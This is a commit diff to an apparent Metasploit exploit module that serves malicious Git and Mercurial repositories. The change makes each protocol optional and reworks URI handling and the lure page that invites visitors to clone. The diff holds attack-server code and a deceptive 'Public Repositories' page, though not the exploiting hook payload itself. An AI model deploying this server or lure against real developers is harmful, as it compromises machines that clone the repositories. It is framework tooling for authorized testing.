Make git/mercurial support toggle-able, default mercurial to off
Jon Hart
parent
574d3624a7
commit
6c8cecf895
|
|
@ -61,16 +61,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('GIT_URI', [true, 'The URI to use as the malicious Git instance', '/git']),
|
||||
OptString.new('MERCURIAL_URI', [true, 'The URI to use as the malicious Git instance', '/hg']),
|
||||
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty to disable)', '/git']),
|
||||
OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty to disable)', '']),
|
||||
OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/'])
|
||||
]
|
||||
)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('GIT_HOOK', [true, 'The Git hook to use for exploitation', 'post-checkout']),
|
||||
OptString.new('MERCURIAL_HOOK', [true, 'The Mercurial hook to use for exploitation', 'update'])
|
||||
OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
|
||||
OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
|
@ -80,13 +80,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
git: { files: {}, trigger: nil },
|
||||
mercurial: { files: {}, trigger: nil }
|
||||
}
|
||||
setup_git
|
||||
setup_mercurial
|
||||
if git_uri.blank? && mercurial_uri.blank?
|
||||
fail ArgumentError, 'Must specify at least one non-blank GIT_URI or MERCURIAL_URI'
|
||||
end
|
||||
setup_git unless git_uri.blank?
|
||||
setup_mercurial unless mercurial_uri.blank?
|
||||
end
|
||||
|
||||
def setup_git
|
||||
# sanity check the malicious URI
|
||||
fail ArgumentError, 'GIT_URI must not be blank' if datastore['GIT_URI'].blank?
|
||||
# URI must start with a /
|
||||
fail ArgumentError, 'GIT_URI must start with a /' unless git_uri =~ /^\//
|
||||
# sanity check the malicious hook:
|
||||
fail ArgumentError, 'GIT_HOOK must not be blank' if datastore['GIT_HOOK'].blank?
|
||||
|
||||
|
|
@ -153,8 +156,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def setup_mercurial
|
||||
# sanity check the malicious URI
|
||||
fail ArgumentError, 'MERCURIAL_URI must not be blank' if datastore['MERCURIAL_URI'].blank?
|
||||
# URI must start with a /
|
||||
fail ArgumentError, 'MERCURIAL_URI must start with a /' unless mercurial_uri =~ /^\//
|
||||
# sanity check the malicious hook:
|
||||
fail ArgumentError, 'MERCURIAL_HOOK must not be blank' if datastore['MERCURIAL_HOOK'].blank?
|
||||
# TODO: build the fake repository
|
||||
|
|
@ -175,8 +178,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def primer
|
||||
hardcoded_uripath(datastore['GIT_URI'])
|
||||
hardcoded_uripath(datastore['MERCURIAL_URI'])
|
||||
hardcoded_uripath(git_uri) unless git_uri.blank?
|
||||
hardcoded_uripath(mercurial_uri) unless mercurial_uri.blank?
|
||||
end
|
||||
|
||||
def check_user_agent(cli, req, expected_ua_re = /^.+/)
|
||||
|
|
@ -198,10 +201,10 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, req)
|
||||
if (user_agent = req.headers['User-Agent'])
|
||||
if user_agent =~ /^git\// && req.uri.start_with?(datastore['GIT_URI'])
|
||||
if user_agent =~ /^git\// && req.uri.start_with?(git_uri)
|
||||
do_git(cli, req)
|
||||
return
|
||||
elsif user_agent =~ /^mercurial\// && req.uri.start_with?(datastore['MERCURIAL_URI'])
|
||||
elsif user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri)
|
||||
do_mercurial(cli, req)
|
||||
return
|
||||
end
|
||||
|
|
@ -213,7 +216,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
def do_git(cli, req)
|
||||
# determine if the requested file is something we know how to serve from our
|
||||
# fake repository and send it if so
|
||||
req_file = URI.parse(req.uri).path.gsub(/^#{datastore['GIT_URI']}/, '')
|
||||
req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
|
||||
if @repo_data[:git][:files].key?(req_file)
|
||||
vprint_status("Sending Git #{req_file}")
|
||||
send_response(cli, @repo_data[:git][:files][req_file])
|
||||
|
|
@ -232,16 +235,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
def do_html(cli, _req)
|
||||
resp = create_response
|
||||
git_uri = URI.parse(get_uri).merge(datastore['GIT_URI'])
|
||||
mercurial_uri = URI.parse(get_uri).merge(datastore['MERCURIAL_URI'])
|
||||
this_git_uri = URI.parse(get_uri).merge(git_uri)
|
||||
this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
|
||||
resp.body = <<HTML
|
||||
<html>
|
||||
<head><title>Public Repositories</title></head>
|
||||
<body>
|
||||
<p>Here are our public repositories:</p>
|
||||
<ul>
|
||||
<li><a href="#{datastore['GIT_URI']}">Git</a> (clone with `git clone #{git_uri}`)</li>
|
||||
<li><a href="#{datastore['MERCURIAL_URI']}">Mercurial</a> (clone with `hg clone #{mercurial_uri}`)</li>
|
||||
<li><a href="#{git_uri}">Git</a> (clone with `git clone #{this_git_uri}`)</li>
|
||||
<li><a href="#{mercurial_uri}">Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>
|
||||
</ul>
|
||||
</body>
|
||||
</html>
|
||||
|
|
@ -253,7 +256,7 @@ HTML
|
|||
def do_mercurial(cli, req)
|
||||
# determine if the requested file is something we know how to serve from our
|
||||
# fake repository and send it if so
|
||||
req_file = URI.parse(req.uri).path.gsub(/^#{datastore['MERCURIAL_URI']}/, '')
|
||||
req_file = URI.parse(req.uri).path.gsub(/^#{mercurial_uri}/, '')
|
||||
if @repo_data[:mercurial][:files].key?(req_file)
|
||||
vprint_status("Sending Mercurial #{req_file}")
|
||||
send_response(cli, @repo_data[:mercurial][:files][req_file])
|
||||
|
|
@ -269,4 +272,12 @@ HTML
|
|||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
|
||||
def git_uri
|
||||
datastore['GIT_URI']
|
||||
end
|
||||
|
||||
def mercurial_uri
|
||||
datastore['MERCURIAL_URI']
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue